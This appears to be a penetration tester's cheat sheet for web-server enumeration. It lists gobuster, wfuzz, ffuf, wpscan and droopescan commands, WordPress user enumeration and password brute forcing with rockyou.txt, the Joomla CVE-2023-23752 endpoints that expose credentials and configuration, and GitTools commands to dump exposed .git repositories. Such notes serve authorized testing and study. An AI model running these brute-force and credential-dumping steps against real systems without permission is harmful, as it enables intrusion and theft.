Port 80 (HTTP)

WhatWeb

whatweb http://IP

Directory Enumeration

Gobuster

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions>

We can use -b for removing specific status codes

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions> -b 403,404

If we want to scan a https web with certificates issues:

gobuster dir -u <url> -w <wordlist.txt> -x <file_extensions> -b 403,404

wfuzz

wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt https://example.com/FUZZ

• --hs/ss "regex" #Hide/Show

• --hc/sc CODE #Hide/Show by code in response

• --hl/sl NUM #Hide/Show by number of lines in response

• --hw/sw NUM #Hide/Show by number of words in response

• --hh/sh NUM #Hide/Show by number of chars in response

• --hc/sc NUM #Hide/Show by response code

ffuf

ffuf -c -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://example.com/FUZZ

• --fr "regex" # Hide/Show by regex in response

• --fc/sc CODE # Hide/Show by response code

• --fl/sl NUM # Hide/Show by number of lines in response

• --fw/sw NUM # Hide/Show by number of words in response

• --fs/sh NUM # Hide/Show by number of chars in response

• --fc/sc NUM # Hide/Show by response code

DNS Subdomain Enumeration

Gobuster

gobuster dns -d <domain> -w <wordlist.txt> -i --wildcard

wfuzz

wfuzz -c --hc=400,404,404 -t 20 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
top1million-20000.txt -H "Host: FUZZ.example.com" -u http://example.com  

VHost Enumeration

gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Fuzzing a Request

ffuf -request ssrf.req -request-proto http -w <(seq 1 65535) -debug-log /dev/stdout

CMS

WordPress

Automatic

wpscan --url http://example.com --api-token "token"

User Enumeration

wpscan --url https://example.com --enumerate u

Brute Force

wpscan --url example.com -U user -P /usr/share/wordlists/rockyou.txt

wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50

Manual

To list the version manually, we can use several methods

• Look at the page code and look in the <meta> tag.

• Search in the readme.html or license.txt file

• Look in the HTTP headers

• Look in /wp-login.php and /wp-admin.php pages

• Try interacting with the REST API using /wp-json/v2/user

User Enumeration

curl https://xxx/wp-json/wp/v2/users

Diccionario wordpress

• /usr/share/wordlists/SecLists/Discovery/Contenido Web/CMS/wordpress.fuzz.txt

• /usr/share/wordlists/SecLists/Discovery/Web-Content/CMS/wp-themes.fuzz.txt

Important Files and Directories Login or authentication

• /wp-login.php (usually changed to login.php).

• /wp-admin/login.php

• /wp-admin/wp-login.php

• xmlrpc.php

Directories

• /wp-content (where plugins and themes are stored).

• /wp-content/uploads/ (where the uploaded files are stored)

• wp-config.php (contains info to connect to the db)

Joomla

Automatic

droopescan scan joomla --url http://joomla-site.local/

Manual

Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.

• Users: http://<host>/api/v1/users?public=true

• Config File: http://<host>/api/index.php/v1/config/application?public=true

Drupal

droopescan scan drupal --url https://example.com

GitTools

./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Enumeration of .git repository

git log
git show <hash>